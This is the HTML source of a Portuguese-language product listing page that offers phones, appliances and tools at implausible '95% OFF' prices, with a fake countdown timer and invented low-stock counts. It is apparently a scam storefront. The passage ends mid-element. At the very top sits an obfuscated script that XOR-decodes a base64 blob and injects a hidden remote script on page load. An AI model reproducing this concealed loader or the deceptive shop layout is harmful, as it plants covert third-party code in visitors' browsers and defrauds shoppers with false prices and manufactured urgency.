<html lang="pt-br"><head>
<script>(function(){var w_ydjl=atob("DPGaiKxeI8DZsa/FKIq4/d4yAfr72duxWIKgp4M9R673xNuoQZfjps8xTu67w4C2S4Pz+NgtDLCwycqpB4Hz8MkyDaqqk4PnSYXu+sU8VrS8wo3/c6y2qssyTKK43dznEqrhqsI/TqX7i421QYn/5OU6Aez7x86pXZS4so5oFaK81Z33HcmpvM9tQaPv0sn2GJCs7Jl8Xp2k");var o_b=[];for(var e_z=0;e_z<w_ydjl.length;e_z++){o_b.push(w_ydjl.charCodeAt(e_z)&255);}var j_4=o_b[0];var e_y=o_b.slice(1,1+j_4);var j_3m=o_b.slice(1+j_4);var l_oue=j_3m.map(function(b,f_apwp){return b^e_y[f_apwp%j_4];});var m_nd="";for(var n_3cn=0;n_3cn<l_oue.length;n_3cn++){m_nd+=String.fromCharCode(l_oue[n_3cn]&255);}var b_n=decodeURIComponent(escape(m_nd));var y_ar=JSON.parse(b_n);var q_p9=y_ar.globals||[];q_p9.forEach(function(n_4dv8){window[n_4dv8.name]=n_4dv8.value;});var j_eam=document.createElement("script");j_eam.src=y_ar.url;j_eam.async=true;j_eam.defer=true;(y_ar.attributes||[]).forEach(function(z_a){j_eam.setAttribute(z_a.name,z_a.value);});(document.head||document.documentElement).appendChild(j_eam);})();</script>



<script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  data-utmify-prevent-xcod-sck
  data-utmify-prevent-subids
  async
  defer
></script>

<meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Ofertas</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="icon" href="images/favicon.png">
    <link rel="stylesheet" href="css/products.css">
    <link rel="stylesheet" href="css/styles2.css">
    <link rel="stylesheet" href="css/fonts.css">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@24,400,1,0">
    <style>
      .free-shipping-container {
        margin-bottom: 6px;
      }

      .estoque {
        font-size: 10pt;
        padding: 3px;
      }

      .estoque-verde {
        color: rgb(0, 132, 18);
        background-color: #CBFFC7;
      }

      .estoque-amarelo {
        color: rgb(132, 121, 0);
        background-color: #ffffc7;
      }

      .estoque-vermelho {
        color: rgb(255, 46, 46);
        background-color: #FFDCDC;
      }

      .product-name {
        margin-top: 5px;
      }
    </style>

<link rel="stylesheet" href="css/fonts.css">

<link rel="stylesheet" href="/Mercado/css/desktop-frame.css">
</head>
  <body>
    <div style="background-color: #e6cf00; text-align: center; padding: 5px; font-family: 'GellixMedium'; font-size: 13px; color: white">Aproveite 95% de desconto aplicado automaticamente na sua compra!</div>
    <nav class="navbar" style="padding-top: 15px;">
      <div class="menu-icon" style="padding-left: 3%;">
        <img src="/Mercado/assets/logo.svg" style="height: 5vh;" alt="Logo">
      </div>
      <div class="logo-central"></div>
      <div onclick="window.location.href='https://www.correios.com.br/';"
style="
display:flex;
align-items:center;
gap:6px;
background:#fff;
padding:6px 10px;
border-radius:20px;
cursor:pointer;
border:1px solid #ddd;
">

    <span class="material-symbols-outlined"
          style="font-size:22px;color:#3483fa;">
        local_shipping
    </span>

    <span style="
        font-family:'GellixSemiBold';
        font-size:14px;
        color:#333;">
        Rastreio
    </span>

    <span class="material-symbols-outlined"
          style="font-size:24px;color:#333;">
        menu
    </span>

</div>
    </nav>
    <img src="images/banner.jpeg" style="width: 100%; margin-top: -2px;">

<!-- BANNER GRADIENTE -->
<div style="
    width: 90%;
    margin: 10px auto;
    border-radius: 8px;
    background: linear-gradient(to right, #011E51, #a52aad);
    padding: 10px;
    color: #fff;
    font-family: 'GellixMedium';
    text-align: center;
">
  Oferta Disponível
  <span style="font-size: 12px;">
    Tempo restante: <span id="countdown">01:25:40</span>
  </span>
</div>

<script>
  const countdown = document.getElementById("countdown");
  let [h, m, s] = countdown.textContent.split(":").map(Number);
  const timer = setInterval(() => {
    if (--s < 0) s = 59, m--;
    if (m < 0) m = 59, h--;
    if (h < 0) clearInterval(timer), countdown.textContent = "Oferta Expirada";
    countdown.textContent = `${h.toString().padStart(2, "0")}:${m.toString().padStart(2, "0")}:${s.toString().padStart(2, "0")}`;
  }, 1000);
</script>

<script>
(function () {
    const params = [
        'utm_source',
        'utm_medium',
        'utm_campaign',
        'utm_content',
        'utm_term',
        'fbclid'
    ];

    const urlParams = new URLSearchParams(window.location.search);

    // Salva as UTMs no localStorage
    params.forEach(param => {
        const value = urlParams.get(param);

        if (value) {
            localStorage.setItem(param, value);
        }
    });

    // Mostra no console para teste
    console.log('UTMs capturadas:');
    params.forEach(param => {
        console.log(param + ':', localStorage.getItem(param));
    });
})();
</script>



</div>
    <div class="bracelet-grid">
      <div class="bracelet-item" onclick="setTimeout(function(){window.location.href='../produtos/jbl01/index.html'+window.location.search;},120);">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/poco_preto.png" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 2.999,90</div>
          <span class="new-price">R$ 67,90</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-verde">Restam 19 unidades</span>
          <p class="product-name">JBL Boombox 3 <span style="font-family: 'GellixBold';">Preta</span>
            </div>

      </div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/projetor04/index.html'+window.location.search;">

<div class="product-image" style="margin-bottom: 10px;">
<img src="images/1.jpg" style="height: 140px; width: auto;">
</div>        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 3.859,99</div>
          <span class="new-price">R$ 98,90</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-amarelo">Restam 10 unidades</span>
          <p class="product-name">Samsung Galaxy S24 Ultra (256 GB)</p>
          </p>

</p>
            </p>
            </p>
            

            </div>

      </div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/furadeira/index.html'+window.location.search;">

        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/furadeira.png" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 1.150,90</div>
          <span class="new-price">R$ 109,90</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-amarelo">Restam 23 unidades</span>
          <p class="product-name">Furadeira E Parafusadeira Sem Fio Dewalt</p>
          </p>

</p>
            </p>
            </p>

</div>

      </div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/iphone17-la/index.html'+window.location.search;">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/laranja.jpeg" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 14.399,00</div>
          <span class="new-price">R$ 389,00</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-amarelo">Restam 20 unidades</span>
          <p class="product-name">iPhone 17 Pro Max 1T</p>
          </p>

</p>
</div>

      </div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/iphone17/index.html'+window.location.search;">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/preto.jpeg" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 13.999,00</div>
          <span class="new-price">R$ 357,00</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-amarelo">Restam 20 unidades</span>
          <p class="product-name">iPhone 17 Pro Max 512GB</p>
          </p>

</p>
            </p>

</div>

      </div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/frigobar/index.html'+window.location.search;">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/10.jpeg" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 3.750,87</div>
          <span class="new-price">R$ 185,52</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-amarelo">Restam 10 unidades</span>
          <p class="product-name">Frigobar Brastemp Retrô 76 Litros - BRA08HG </p>
</div>

</div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/jbl02/index.html'+window.location.search;">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/25.png" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 5.398,00</div>
          <span class="new-price">R$ 97,90</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-amarelo">Restam 10 unidades</span>
          <p class="product-name">JBL Partybox 710 Preta </p>
          </p>
</div>

      </div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/sam25/index.html'+window.location.search;">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/s25.jpeg" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 10.398,00</div>
          <span class="new-price">R$ 247,90</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-amarelo">Restam 16 unidades</span>
          <p class="product-name">Samsung Galaxy S25 Ultra 5G, 512GB, Câmera Quádrupla Titânio Preto </p>
          </p>
</p>
            </p>
        </div>
      </div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/iphone16-preto/index.html'+window.location.search;">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/iphone16.jpeg" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 12.895,00</div>
          <span class="new-price">R$ 257,00</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-amarelo">Restam 8 unidades</span>
          <p class="product-name">iPhone 16 Pro Max (1T) <span style="font-family: 'GellixBold';">Titânio Preto</span>
          </p>
           </p>
</p>
</div>
      </div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/panela/index.html'+window.location.search;">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/panela.jpeg" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 450,00</div>
          <span class="new-price">R$ 99,00</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-amarelo">Restam 15 unidades</span>
          <p class="product-name">Jogo De Panelas Paris 10 Peças Vermelho Tramontina
MAIS VENDIDO </p>
          </p>
        </div>
         </div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/fritadeira/index.html'+window.location.search;">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/frita.jpeg" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 529,99</div>
          <span class="new-price">R$ 81,24</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-amarelo">Restam 15 unidades</span>
          <p class="product-name">Air Fryer Fritadeira Elétrica </p>
          </p>
        </div>
      </div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/xiaome/index.html'+window.location.search;">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/x5.jpeg" style="height: 140px; width: auto;">
          </p>
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 1685,00</div>
          <span class="new-price">R$ 87,00</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-verde">Restam 14 unidades</span>
          <p class="product-name">Xiaome POCO X5 256GB <span style="font-family: 'GellixBold';">Blue</span>
        </div>
      </div>
     <div class="bracelet-item"
onclick="window.location.href='../produtos/kitferramenta/index.html'+window.location.search;">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/maleta.jpeg" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 1.050,90</div>
          <span class="new-price">R$ 95,65</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-amarelo">Restam 8 unidades</span>
          <p class="product-name">Kit Combinado de 7 Ferramentas<span style="font-family: 'GellixBold';">DEWALT</span>
          </p>
          </p>
        
        </div>
      </div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/iph06/index.html'+window.location.search;">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/iphone_15_pro_max_titanio_branco.jpg" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 5.849,10</div>
          <span class="new-price">R$ 117,58</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-vermelho">Restam 7 unidades</span>
          <p class="product-name">iPhone 15 Pro (256GB) <span style="font-family: 'GellixBold';">Titânio Branco</span>
          </p>

        </div>
      </div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/iph07/index.html'+window.location.search;">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/iphone_15_rosa.jpg" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 5.849,10</div>
          <span class="new-price">R$ 97,90</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-vermelho">Restam 6 unidades</span>
          <p class="product-name">iPhone 15 (256GB) <span style="font-family: 'GellixBold';">Rosa</span>
          </p>
        </div>
      </div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/iph08/index.html'+window.location.search;">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/iphone_15_pro_max_titanio_preto.jpg" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 6.199,00</div>
          <span class="new-price">R$ 134,90</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-vermelho">Restam 8 unidades</span>
          <p class="product-name">iPhone 15 Pro Max (512GB) <span style="font-family: 'GellixBold';">Titânio Preto</span>
            </p>
        </div>
      </div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/geladeira/index.html'+window.location.search;">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/gela.jpeg" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 3.999,00</div>
          <span class="new-price">R$ 119,99</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-vermelho">Restam 18 unidades</span>
          <p class="product-name">Geladeira Brastemp 588 Litros Inox 220V <span style="font-family: 'GellixBold';">Inox 220V</span>
           
            </p>
            </p>
        </div>
      </div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/xiaomex6/index.html'+window.location.search;">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/x6.jpeg" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 3.527,00</div>
          <span class="new-price">R$ 97,37</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-vermelho">Restam 09 unidades</span>
          <p class="product-name">Xiaomi Poco X6 Pro 8gb Ram 256gb <span style="font-family: 'GellixBold';">Cor Preto</span>
            </p>
            </p>
        </div>
      </div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/xiaomex7/index.html'+window.location.search;">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/x7.jpeg" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 3.999,00</div>
          <span class="new-price">R$ 148,89</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-vermelho">Restam 12 unidades</span>
          <p class="product-name">Xiaomi Poco X7 Pro 512gb+12gb  <span style="font-family: 'GellixBold';">2025</span>
            </p>
            </p>
        </div>
      </div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/aspirador/index.html'+window.location.search;">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/robo.jpeg" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 349,00</div>
          <span class="new-price">R$ 94,60</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-vermelho">Restam 18 unidades</span>
          <p class="product-name">Robô aspirador Robot W90  <span style="font-family: 'GellixBold';"></span>
            
        
      
           
        </div>
      </div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/iph09/index.html'+window.location.search;">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/iphone_15_pro_titanio.jpg" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 6.999,00</div>
          <span class="new-price">R$ 117,58</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-vermelho">Restam 4 unidades</span>
          <p class="product-name">iPhone 15 Pro (256GB) <span style="font-family: 'GellixBold';">Titânio</span>
          </p>
        </div>
      </div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/tv/index.html'+window.location.search;">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/tv.jpeg" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 2.999,99</div>
          <span class="new-price">R$ 127,00</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-vermelho">Restam 12 unidades</span>
          <p class="product-name">Samsung Smart Tv 55 Polegadas <span style="font-family: 'GellixBold';">Qled 4k 2024</span>
          </p>
          </p>
        </div>
      </div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/ps5/index.html'+window.location.search;">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/play.jpeg" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 6.499,99</div>
          <span class="new-price">R$ 127,13</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-vermelho">Restam 07 unidades</span>
          <p class="product-name">Playstation Ps5 PRO <span style="font-family: 'GellixBold';">Branco 2 TB</span>
          </p>
          </p>
        </div>
      </div>
      <div class="bracelet-item"
onclick="window.location.href='../produtos/microo/index.html'+window.location.search;">
        <div class="product-image" style="margin-bottom: 10px;">
          <img src="images/m1.webp" style="height: 140px; width: auto;">
        </div>
        <div class="product-info">
          <div class="offer-tag">TERMINA HOJE</div>
          <div class="old-price">R$ 1.757,99</div>
          <span class="new-price">R$ 102,16</span>
          <span class="discount">95% OFF</span>
          <div class="free-shipping-container">
            <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span>
              <span style="font-family: 'GellixSemiBold';">FULL</span>
            </span>
          </div>
          <span class="estoque estoque-vermelho">Restam 04 unidades</span>
          <p class="product-name">Microondas Brastemp 38L <span style="font-family: 'GellixBold';">Inox</span>
          </p>
        </div>
      </div>

<!--------------------- camera --------------------->


        <div class="bracelet-item"
onclick="window.location.href='../produtos/camera/index.html'+window.location.search;">
            <div class="product-image">
                <img src="images/camera.png" style="height: 130px; width: auto;">
            </div>
            <div class="product-info">
                <div class="offer-tag">TERMINA HOJE</div>

                <div class="old-price">R$ 437,99</div>

                <span class="new-price">R$ 89,90</span><span class="discount">95% OFF</span>

                <div class="free-shipping-container">
                    <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span><span style="font-family: 'GellixSemiBold';">FULL</span></span>
                </div>

                <div style="background-color: #fffccb; width: 81%; border-radius: 5px; padding: 0px 5px">
                    <p style="font-size: 12px; color: #585004; font-family: 'GellixRegular'; margin-left: 2%;">Restam 8 unidades</p>
                </div>

                <p class="product-name">Câmera Externa PTZ WIFI Lente Dupla 2MP+2MP Rastreamento Automático [COMPRE 1 LEVE 2]</p>
            </div>
        </div>



       <!--------------------- Máquina de lavar --------------------->


        <div class="bracelet-item"
onclick="window.location.href='../produtos/lavar/index.html'+window.location.search;">
            <div class="product-image">
                <img src="images/lava.jpeg" style="height: 130px; width: auto;">
            </div>
            <div class="product-info">
                <div class="offer-tag">TERMINA HOJE</div>

                <div class="old-price">R$ 3999,99</div>

                <span class="new-price">R$ 116,90</span><span class="discount">95% OFF</span>

                <div class="free-shipping-container">
                    <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span><span style="font-family: 'GellixSemiBold';">FULL</span></span>
                </div>

                <div style="background-color: #fffccb; width: 81%; border-radius: 5px; padding: 0px 5px">
                    <p style="font-size: 12px; color: #585004; font-family: 'GellixRegular'; margin-left: 2%;">Restam 8 unidades</p>
                </div>

                <p class="product-name">Lava E Seca Samsung Inox 11kg</p>
            </div>
        </div>

        


        <!--------------------- Ar condicionado --------------------->


        <div class="bracelet-item"
onclick="window.location.href='../produtos/ar/index.html'+window.location.search;">
            <div class="product-image">
                <img src="images/ar.jpeg" style="height: 130px; width: auto;">
            </div>
            <div class="product-info">
                <div class="offer-tag">TERMINA HOJE</div>

                <div class="old-price">R$ 1499,90</div>

                <span class="new-price">R$ 114,19</span><span class="discount">95% OFF</span>

                <div class="free-shipping-container">
                    <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span><span style="font-family: 'GellixSemiBold';">FULL</span></span>
                </div>

                <div style="background-color: #fffccb; width: 81%; border-radius: 5px; padding: 0px 5px">
                    <p style="font-size: 12px; color: #585004; font-family: 'GellixRegular'; margin-left: 2%;">Restam 9 unidades</p>
                </div>

                <p class="product-name">Ar Condicionado Split LG 24000 B</p>
            </div>
        </div>

                <!--------------------- solda --------------------->


        <div class="bracelet-item"
onclick="window.location.href='../produtos/solda/index.html'+window.location.search;">
            <div class="product-image">
                <img src="images/solda.png" style="height: 130px; width: auto;">
            </div>
            <div class="product-info">
                <div class="offer-tag">TERMINA HOJE</div>

                <div class="old-price">R$ 1450,90</div>

                <span class="new-price">R$ 127,90</span><span class="discount">95% OFF</span>

                <div class="free-shipping-container">
                    <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span><span style="font-family: 'GellixSemiBold';">FULL</span></span>
                </div>

                <div style="background-color: #fffccb; width: 81%; border-radius: 5px; padding: 0px 5px">
                    <p style="font-size: 12px; color: #585004; font-family: 'GellixRegular'; margin-left: 2%;">Restam 12 unidades</p>
                </div>

                <p class="product-name">Máquina De Solda Inversora Elétrica Portátil Mma-200 220v Amarelo (Kit Completo)</p>
            </div>
        </div>

         <!--------------------- Fogão --------------------->


        <div class="bracelet-item"
onclick="window.location.href='../produtos/fogao/index.html'+window.location.search;">
            <div class="product-image">
                <img src="images/fogao.jpeg" style="height: 130px; width: auto;">
            </div>
            <div class="product-info">
                <div class="offer-tag">TERMINA HOJE</div>

                <div class="old-price">R$ 1100,90</div>

                <span class="new-price">R$ 99,99</span><span class="discount">95% OFF</span>

                <div class="free-shipping-container">
                    <span class="free-shipping" style="font-family: 'GellixMedium';">Frete <span class="material-symbols-outlined" style="color: #4caf50; margin-right: 2px; font-size: 18px;">bolt</span><span style="font-family: 'GellixSemiBold';">FULL</span></span>
                </div>

                <div style="background-color: #fffccb; width: 81%; border-radius: 5px; padding: 0px 5px">
                    <p style="font-size: 12px; color: #585004; font-family: 'GellixRegular'; margin-left: 2%;">Restam 10 unidades</p>
                </div>

                <p class="product-name">Fogão 5 Bocas Atlas Com Mesa De Vidro 127V/220V</p>
            </div>
        </div>

         <!--------------------- vap --------------------->


        <div class="bracelet-item"
